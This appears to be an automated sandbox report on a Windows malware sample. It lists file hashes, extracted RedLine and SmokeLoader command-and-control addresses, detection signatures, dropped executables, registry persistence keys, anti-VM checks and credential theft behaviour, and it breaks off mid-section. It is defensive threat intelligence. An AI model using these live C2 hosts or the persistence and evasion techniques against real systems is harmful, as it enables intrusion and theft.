Resubmissions
19-08-2021 18:59
210819-yrzbdtvqln 1018-08-2021 20:25
210818-4hztrzavcs 1018-08-2021 17:24
210818-9p8lqjhwv2 1017-08-2021 06:12
210817-kl4jvaaq7x 1016-08-2021 10:04
210816-nwc3tqkr3a 1016-08-2021 10:04
210816-5r5rafnh7e 1016-08-2021 10:04
210816-kdgh648t5e 1016-08-2021 09:37
210816-9esgfwsmfe 1016-08-2021 08:13
210816-26la9rblgn 1017-08-2021 08:51
210817-w2l5yq2wlnAnalysis
-
max time kernel
1804s -
max time network
1807s -
platform
windows11_x64 -
resource
win11 -
submitted
16-08-2021 10:04
Static task
static1
Behavioral task
behavioral1
Sample
EB7233922891E1DAD0434FBD52623647.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
EB7233922891E1DAD0434FBD52623647.exe
Resource
win11
Behavioral task
behavioral3
Sample
EB7233922891E1DAD0434FBD52623647.exe
Resource
win10v20210408
General
-
Target
EB7233922891E1DAD0434FBD52623647.exe
-
Size
7.9MB
-
MD5
eb7233922891e1dad0434fbd52623647
-
SHA1
331126b108532ab9a1e932141bff55a38656bce9
-
SHA256
b39e29c24003441609c457a3455cae9d9fb6f4462f5e06d0c1d317d243711cb8
-
SHA512
597fbb0f397c45c8a2c5f63893c6d6bd4641e952510dfcac05dadb7afaaf4e005df1261649d4e79951979bad0be1fb09feebac7a6d23c31679590cbf40e1d4ac
Malware Config
Extracted
metasploit
windows/single_exec
Extracted
redline
installs3
65.21.228.92:46802
Extracted
smokeloader
2020
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Signatures
-
Glupteba Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4504-206-0x0000000001650000-0x0000000001F76000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rUNdlL32.eXerundll32.exerUNdlL32.eXedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1008 4848 rUNdlL32.eXe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4176 4848 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5264 4848 rUNdlL32.eXe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 8 IoCs
Processes:
resource yara_rule C:\Users\Admin\Documents\LvJ59gJxc3LSPWvaIC75WK3C.exe family_redline C:\Users\Admin\Documents\bAGRnF23dqqSQc9GLsP_8f2i.exe family_redline behavioral2/memory/5236-337-0x000001AEC8E20000-0x000001AEC8E39000-memory.dmp family_redline C:\Users\Admin\Documents\bAGRnF23dqqSQc9GLsP_8f2i.exe family_redline behavioral2/memory/4636-435-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/5392-481-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/4840-488-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/4840-523-0x00000000052E0000-0x00000000058F8000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 19 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exejfiag3g_gg.exeWerFault.exeXuvylitadae.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 1432 created 1096 1432 WerFault.exe rundll32.exe PID 3188 created 4504 3188 WerFault.exe Info.exe PID 5792 created 5288 5792 WerFault.exe S9vvbu_thmJNivbyrd5cbgjY.exe PID 5832 created 5276 5832 WerFault.exe 1JXoSiUoBQDRFxKQt6PfAJQT.exe PID 5992 created 5556 5992 WerFault.exe KaN6V1t36aPvGbjwrCNT4frv.exe PID 5824 created 5340 5824 jfiag3g_gg.exe ZP8ROxtPgq7xzmkTnY1ILt2W.exe PID 5740 created 5592 5740 WerFault.exe bXB9E3wOjLBBoAzWOKy1jhXH.exe PID 5372 created 5192 5372 Xuvylitadae.exe S5JNKYGQ09fmPKqgYZFlX5Wl.exe PID 2104 created 2000 2104 WerFault.exe rundll32.exe PID 3976 created 4408 3976 WerFault.exe rundll32.exe PID 1204 created 1884 1204 WerFault.exe askinstall53.exe PID 6736 created 7084 6736 WerFault.exe anyname.exe PID 5428 created 7084 5428 WerFault.exe anyname.exe PID 5524 created 7084 5524 WerFault.exe anyname.exe PID 3896 created 3128 3896 WerFault.exe A126.exe PID 6356 created 5452 6356 WerFault.exe explorer.exe PID 5764 created 1400 5764 WerFault.exe 8421129.exe PID 5512 created 4780 5512 WerFault.exe 1478644.exe PID 3004 created 5344 3004 WerFault.exe 4881157.exe -
Processes:
resource yara_rule behavioral2/memory/4504-206-0x0000000001650000-0x0000000001F76000-memory.dmp evasion C:\Users\Admin\Documents\nmRKRFlsM2jdww3bmd_iqMIN.exe evasion C:\Users\Admin\Documents\K9nJsFAus_AD4WbNTjIG3wOs.exe evasion C:\Users\Admin\Documents\i51OEtivp64F1h3jriSb9179.exe evasion C:\Users\Admin\Documents\K9nJsFAus_AD4WbNTjIG3wOs.exe evasion behavioral2/memory/4840-523-0x00000000052E0000-0x00000000058F8000-memory.dmp evasion -
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
-
suricata: ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz
suricata: ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
Processes:
resource yara_rule behavioral2/memory/5556-296-0x00000000049F0000-0x0000000004A8D000-memory.dmp family_vidar -
Blocklisted process makes network request 9 IoCs
Processes:
rUNdlL32.eXeMsiExec.exepowershell.exeflow pid process 117 5264 rUNdlL32.eXe 193 6456 MsiExec.exe 195 6456 MsiExec.exe 196 6456 MsiExec.exe 197 6456 MsiExec.exe 198 6456 MsiExec.exe 206 6456 MsiExec.exe 260 4276 powershell.exe 261 4276 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
aipackagechainer.exeh5Mf7fCP0iLoTpkZt0_ezgBy.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts aipackagechainer.exe File opened for modification C:\Windows\system32\drivers\etc\hosts h5Mf7fCP0iLoTpkZt0_ezgBy.exe -
Executes dropped EXE 64 IoCs
Processes:
KRSetp.exeFolder.exeFolder.exeInfo.exeInstallation.exeyOpfFns9feXR1oA37BXrUSoj.exei51OEtivp64F1h3jriSb9179.exeS5JNKYGQ09fmPKqgYZFlX5Wl.exeLvJ59gJxc3LSPWvaIC75WK3C.exeh5Mf7fCP0iLoTpkZt0_ezgBy.exeOaUqDiJqLrReD6nAIAxVSWA8.exeK9nJsFAus_AD4WbNTjIG3wOs.exenmRKRFlsM2jdww3bmd_iqMIN.exeZM0tOe8uO666xAL03x_SEt7G.exe1JXoSiUoBQDRFxKQt6PfAJQT.exeS9vvbu_thmJNivbyrd5cbgjY.exe6fb0NKLzbR9O1Hnpb8meEjoY.exebEYG8MCmwS_N0mgL9uYFs3Jb.exeMsKeXpA3JCm5KJWAfbFTLe6p.exeZP8ROxtPgq7xzmkTnY1ILt2W.exebAGRnF23dqqSQc9GLsP_8f2i.exeKaN6V1t36aPvGbjwrCNT4frv.exeiHcz2PjFZ8e9IDvRcRQLV9o9.exebXB9E3wOjLBBoAzWOKy1jhXH.exebFClUtu0XfsHUGnX6uO9BE2D.exe22222.exebEYG8MCmwS_N0mgL9uYFs3Jb.exeiHcz2PjFZ8e9IDvRcRQLV9o9.exeAGV_ZCjRSXUJEYPKIJWOth72.exeX6pFteX1hujq71gAoddJIl03.exeX6pFteX1hujq71gAoddJIl03.tmpcustomer3.exemd8_8eus.exejooyu.exe1cu20YjSd19Ml5gGnIdtbCyZ.exe11111.exejfiag3g_gg.exe8421129.exeK9nJsFAus_AD4WbNTjIG3wOs.exenmRKRFlsM2jdww3bmd_iqMIN.exe3544711.exei51OEtivp64F1h3jriSb9179.exemd9_1sjm.exeaskinstall53.exeK9nJsFAus_AD4WbNTjIG3wOs.exe11111.exeultramediaburner.tmpSetup.exeK9nJsFAus_AD4WbNTjIG3wOs.exeGameBox64bit.exenmRKRFlsM2jdww3bmd_iqMIN.exeCleaner Installation.exeVersiumresearch.exeMediaBurner2.exenote8876.exezhangfei.exeGameBoxWin64.exeWeather Installation.exeConhost.exeMediaBurner2.tmpmsedge.exe11111.exepid process 4780 KRSetp.exe 4924 Folder.exe 4992 Folder.exe 4504 Info.exe 3980 Installation.exe 5168 yOpfFns9feXR1oA37BXrUSoj.exe 5180 i51OEtivp64F1h3jriSb9179.exe 5192 S5JNKYGQ09fmPKqgYZFlX5Wl.exe 5204 LvJ59gJxc3LSPWvaIC75WK3C.exe 5216 h5Mf7fCP0iLoTpkZt0_ezgBy.exe 5236 OaUqDiJqLrReD6nAIAxVSWA8.exe 5228 K9nJsFAus_AD4WbNTjIG3wOs.exe 5252 nmRKRFlsM2jdww3bmd_iqMIN.exe 5264 ZM0tOe8uO666xAL03x_SEt7G.exe 5276 1JXoSiUoBQDRFxKQt6PfAJQT.exe 5288 S9vvbu_thmJNivbyrd5cbgjY.exe 5300 6fb0NKLzbR9O1Hnpb8meEjoY.exe 5316 bEYG8MCmwS_N0mgL9uYFs3Jb.exe 5328 MsKeXpA3JCm5KJWAfbFTLe6p.exe 5340 ZP8ROxtPgq7xzmkTnY1ILt2W.exe 5364 bAGRnF23dqqSQc9GLsP_8f2i.exe 5556 KaN6V1t36aPvGbjwrCNT4frv.exe 5548 iHcz2PjFZ8e9IDvRcRQLV9o9.exe 5592 bXB9E3wOjLBBoAzWOKy1jhXH.exe 5584 bFClUtu0XfsHUGnX6uO9BE2D.exe 5908 22222.exe 6108 bEYG8MCmwS_N0mgL9uYFs3Jb.exe 5260 iHcz2PjFZ8e9IDvRcRQLV9o9.exe 2260 AGV_ZCjRSXUJEYPKIJWOth72.exe 796 X6pFteX1hujq71gAoddJIl03.exe 1284 X6pFteX1hujq71gAoddJIl03.tmp 1568 customer3.exe 5884 md8_8eus.exe 5836 jooyu.exe 2708 1cu20YjSd19Ml5gGnIdtbCyZ.exe 3180 11111.exe 5824 jfiag3g_gg.exe 1400 8421129.exe 5732 K9nJsFAus_AD4WbNTjIG3wOs.exe 4084 nmRKRFlsM2jdww3bmd_iqMIN.exe 1588 3544711.exe 4636 i51OEtivp64F1h3jriSb9179.exe 4252 md9_1sjm.exe 1884 askinstall53.exe 5896 K9nJsFAus_AD4WbNTjIG3wOs.exe 5248 11111.exe 5744 ultramediaburner.tmp 5908 22222.exe 5480 Setup.exe 5392 K9nJsFAus_AD4WbNTjIG3wOs.exe 496 GameBox64bit.exe 4840 nmRKRFlsM2jdww3bmd_iqMIN.exe 5692 Cleaner Installation.exe 3284 Versiumresearch.exe 3632 MediaBurner2.exe 3980 note8876.exe 1664 zhangfei.exe 1884 askinstall53.exe 3472 GameBoxWin64.exe 2536 Weather Installation.exe 1604 Conhost.exe 2240 MediaBurner2.tmp 5460 msedge.exe 6112 11111.exe -
Processes:
resource yara_rule behavioral2/memory/5884-367-0x0000000000400000-0x000000000067D000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
WerFault.exe9A5E.exebAGRnF23dqqSQc9GLsP_8f2i.exeLvJ59gJxc3LSPWvaIC75WK3C.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9A5E.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9A5E.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bAGRnF23dqqSQc9GLsP_8f2i.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bAGRnF23dqqSQc9GLsP_8f2i.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion LvJ59gJxc3LSPWvaIC75WK3C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion LvJ59gJxc3LSPWvaIC75WK3C.exe -
Drops startup file 2 IoCs
Processes:
customer3.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe customer3.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe customer3.exe -
Loads dropped DLL 64 IoCs
Processes:
rundll32.exeOaUqDiJqLrReD6nAIAxVSWA8.exeX6pFteX1hujq71gAoddJIl03.tmprundll32.exeCleaner Installation.exeGameBoxWin64.exeWeather Installation.exeMediaBurner2.tmprundll32.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exeWerFault.exeMsiExec.exeWeather_Installation.exeWeather.exeWeather.exeWeather.exeWeather.exeWeather.exeWeather.exeWeather.exeWeather.exepid process 1096 rundll32.exe 5236 OaUqDiJqLrReD6nAIAxVSWA8.exe 1284 X6pFteX1hujq71gAoddJIl03.tmp 1284 X6pFteX1hujq71gAoddJIl03.tmp 2000 rundll32.exe 5692 Cleaner Installation.exe 3472 GameBoxWin64.exe 3472 GameBoxWin64.exe 2536 Weather Installation.exe 2240 MediaBurner2.tmp 4408 rundll32.exe 3472 GameBoxWin64.exe 2488 MsiExec.exe 2488 MsiExec.exe 4976 MsiExec.exe 4976 MsiExec.exe 4976 MsiExec.exe 5504 MsiExec.exe 5504 MsiExec.exe 6456 MsiExec.exe 6456 MsiExec.exe 6456 MsiExec.exe 6456 MsiExec.exe 6456 MsiExec.exe 6456 MsiExec.exe 6456 MsiExec.exe 6456 MsiExec.exe 6456 MsiExec.exe 6456 MsiExec.exe 3896 WerFault.exe 3896 WerFault.exe 3896 WerFault.exe 6816 MsiExec.exe 6816 MsiExec.exe 5424 Weather_Installation.exe 5424 Weather_Installation.exe 5424 Weather_Installation.exe 5424 Weather_Installation.exe 5424 Weather_Installation.exe 4032 Weather.exe 5424 Weather_Installation.exe 4032 Weather.exe 4032 Weather.exe 5424 Weather_Installation.exe 2788 Weather.exe 2360 Weather.exe 2360 Weather.exe 2360 Weather.exe 6012 Weather.exe 6012 Weather.exe 6012 Weather.exe 2360 Weather.exe 1108 Weather.exe 1108 Weather.exe 1108 Weather.exe 6656 Weather.exe 6656 Weather.exe 6656 Weather.exe 6656 Weather.exe 492 Weather.exe 492 Weather.exe 492 Weather.exe 6396 Weather.exe 6396 Weather.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Documents\LvJ59gJxc3LSPWvaIC75WK3C.exe themida C:\Users\Admin\Documents\bAGRnF23dqqSQc9GLsP_8f2i.exe themida C:\Users\Admin\Documents\bAGRnF23dqqSQc9GLsP_8f2i.exe themida behavioral2/memory/5364-370-0x0000000000BD0000-0x0000000000BD1000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
Processes:
msedge.exemsedge.exeWeather_Installation.exeultramediaburner.tmpaipackagechainer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" msedge.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Weather_Installation.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Weather = "C:\\Users\\Admin\\AppData\\Roaming\\Weather\\Weather.exe --PH33" Weather_Installation.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" ultramediaburner.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\Taewaezhobume.exe\"" aipackagechainer.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run aipackagechainer.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ aipackagechainer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
bAGRnF23dqqSQc9GLsP_8f2i.exeLvJ59gJxc3LSPWvaIC75WK3C.exemd9_1sjm.exenote8876.exe9A5E.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA bAGRnF23dqqSQc9GLsP_8f2i.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA LvJ59gJxc3LSPWvaIC75WK3C.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA note8876.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 9A5E.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
Weather Installation.exeCleaner Installation.exeWerFault.exeGameBoxWin64.exemsiexec.exedescription ioc process File opened (read-only) \??\F: Weather Installation.exe File opened (read-only) \??\L: Cleaner Installation.exe File opened (read-only) \??\O: Cleaner Installation.exe File opened (read-only) \??\F: WerFault.exe File opened (read-only) \??\N: GameBoxWin64.exe File opened (read-only) \??\R: Weather Installation.exe File opened (read-only) \??\K: Cleaner Installation.exe File opened (read-only) \??\H: GameBoxWin64.exe File opened (read-only) \??\Z: Weather Installation.exe File opened (read-only) \??\X: GameBoxWin64.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\E: GameBoxWin64.exe File opened (read-only) \??\Y: GameBoxWin64.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\G: Weather Installation.exe File opened (read-only) \??\N: WerFault.exe File opened (read-only) \??\X: WerFault.exe File opened (read-only) \??\F: GameBoxWin64.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Y: Weather Installation.exe File opened (read-only) \??\U: Cleaner Installation.exe File opened (read-only) \??\P: WerFault.exe File opened (read-only) \??\P: GameBoxWin64.exe File opened (read-only) \??\O: Weather Installation.exe File opened (read-only) \??\S: Weather Installation.exe File opened (read-only) \??\P: Cleaner Installation.exe File opened (read-only) \??\L: WerFault.exe File opened (read-only) \??\V: WerFault.exe File opened (read-only) \??\B: GameBoxWin64.exe File opened (read-only) \??\E: Cleaner Installation.exe File opened (read-only) \??\F: Cleaner Installation.exe File opened (read-only) \??\H: Cleaner Installation.exe File opened (read-only) \??\R: Cleaner Installation.exe File opened (read-only) \??\A: Cleaner Installation.exe File opened (read-only) \??\T: GameBoxWin64.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\A: Weather Installation.exe File opened (read-only) \??\U: WerFault.exe File opened (read-only) \??\M: GameBoxWin64.exe File opened (read-only) \??\E: Weather Installation.exe File opened (read-only) \??\H: Weather Installation.exe File opened (read-only) \??\W: Cleaner Installation.exe File opened (read-only) \??\G: WerFault.exe File opened (read-only) \??\U: GameBoxWin64.exe File opened (read-only) \??\Q: Weather Installation.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\A: GameBoxWin64.exe File opened (read-only) \??\I: Weather Installation.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\Q: GameBoxWin64.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\M: WerFault.exe File opened (read-only) \??\Y: WerFault.exe File opened (read-only) \??\O: GameBoxWin64.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: Cleaner Installation.exe File opened (read-only) \??\Q: Cleaner Installation.exe File opened (read-only) \??\E: WerFault.exe File opened (read-only) \??\I: GameBoxWin64.exe File opened (read-only) \??\Z: GameBoxWin64.exe File opened (read-only) \??\J: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 21 ipinfo.io 48 ipinfo.io 80 ip-api.com 121 ipinfo.io 173 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
bAGRnF23dqqSQc9GLsP_8f2i.exeLvJ59gJxc3LSPWvaIC75WK3C.exeWerFault.exe9A5E.exepid process 5364 bAGRnF23dqqSQc9GLsP_8f2i.exe 5204 LvJ59gJxc3LSPWvaIC75WK3C.exe 5512 WerFault.exe 5772 9A5E.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
bEYG8MCmwS_N0mgL9uYFs3Jb.exeiHcz2PjFZ8e9IDvRcRQLV9o9.exeWerFault.exeK9nJsFAus_AD4WbNTjIG3wOs.exenmRKRFlsM2jdww3bmd_iqMIN.exeGameBox64bit.exeyOpfFns9feXR1oA37BXrUSoj.exeh5Mf7fCP0iLoTpkZt0_ezgBy.exedescription pid process target process PID 5316 set thread context of 6108 5316 bEYG8MCmwS_N0mgL9uYFs3Jb.exe bEYG8MCmwS_N0mgL9uYFs3Jb.exe PID 5548 set thread context of 5260 5548 iHcz2PjFZ8e9IDvRcRQLV9o9.exe iHcz2PjFZ8e9IDvRcRQLV9o9.exe PID 5180 set thread context of 4636 5180 WerFault.exe i51OEtivp64F1h3jriSb9179.exe PID 5228 set thread context of 5392 5228 K9nJsFAus_AD4WbNTjIG3wOs.exe K9nJsFAus_AD4WbNTjIG3wOs.exe PID 5252 set thread context of 4840 5252 nmRKRFlsM2jdww3bmd_iqMIN.exe nmRKRFlsM2jdww3bmd_iqMIN.exe PID 496 set thread context of 5128 496 GameBox64bit.exe GameBox64bit.exe PID 5168 set thread context of 6704 5168 yOpfFns9feXR1oA37BXrUSoj.exe yOpfFns9feXR1oA37BXrUSoj.exe PID 5216 set thread context of 5968 5216 h5Mf7fCP0iLoTpkZt0_ezgBy.exe h5Mf7fCP0iLoTpkZt0_ezgBy.exe -
Drops file in Program Files directory 33 IoCs
Processes:
aipackagechainer.exeultramediaburner.tmpSetup.exebFClUtu0XfsHUGnX6uO9BE2D.exeh5Mf7fCP0iLoTpkZt0_ezgBy.exenote8876.exedescription ioc process File created C:\Program Files\Microsoft Office 15\ATKMCPCBQB\ultramediaburner.exe.config aipackagechainer.exe File created C:\Program Files (x86)\Windows Photo Viewer\Taewaezhobume.exe.config aipackagechainer.exe File created C:\Program Files\Microsoft Office 15\ATKMCPCBQB\ultramediaburner.exe aipackagechainer.exe File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-KTNRU.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe Setup.exe File created C:\Program Files (x86)\Windows Photo Viewer\Taewaezhobume.exe aipackagechainer.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jooyu.exe bFClUtu0XfsHUGnX6uO9BE2D.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe bFClUtu0XfsHUGnX6uO9BE2D.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini bFClUtu0XfsHUGnX6uO9BE2D.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe Setup.exe File created C:\Program Files (x86)\UltraMediaBurner\is-9C8N6.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\customer3.exe bFClUtu0XfsHUGnX6uO9BE2D.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe Setup.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\resources.pak h5Mf7fCP0iLoTpkZt0_ezgBy.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe bFClUtu0XfsHUGnX6uO9BE2D.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\d.INTEG.RAW note8876.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\resources.pak h5Mf7fCP0iLoTpkZt0_ezgBy.exe File created C:\Program Files (x86)\GameBox INC\GameBox\d note8876.exe File created C:\Program Files (x86)\GameBox INC\GameBox\d.jfm note8876.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\d.jfm note8876.exe File created C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\d note8876.exe File created C:\Program Files (x86)\GameBox INC\GameBox\tmp.edb note8876.exe -
Drops file in Windows directory 23 IoCs
Processes:
